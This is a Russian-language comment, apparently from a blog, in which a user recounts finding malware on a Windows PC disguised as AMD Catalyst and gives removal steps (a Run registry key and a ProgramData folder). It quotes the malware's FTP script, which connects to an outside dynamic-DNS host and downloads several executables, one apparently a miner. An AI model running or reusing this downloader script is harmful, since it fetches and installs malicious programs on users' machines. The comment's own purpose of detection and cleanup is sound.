Для начала скачал Process Explorer (спасибо, Марк Руссинович)
Отсюда видно, что запущен процесс с конфигурацией, взятой из файла config, в некой темповой директории. Идём в директорию и наблюдаем 2 файла:
config
open 02adm2.chickenkiller.comcopi.bat
guest
guest
binary
cd amd2
get upd.exe C:\ProgramData\Catalyst\upd.exe
get upd1.exe C:\ProgramData\Catalyst\upd1.exe
get color.exe C:\ProgramData\Catalyst\color.exe
get mnr.exe C:\ProgramData\Catalyst\mnr.exe
quit
exit
FTP -s:configЧто делает-понятно. Каталист потом сам же скаченые файлы и запустит.
Директорию удалил, а вот как запустился этот copi.bat, я не нашел... Возможно прописан был на один запуск и самоудаление. Надеюсь :D
P.S. Ни MSE, ни Касперский угроз не обнаружили.
UPD:
1.Удалите запись в реестре в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run с именем AMD Catalyst
2. Удалите директорию C:\ProgramData\Catalyst
Всегда рад помочь ;)
ОтветитьУдалить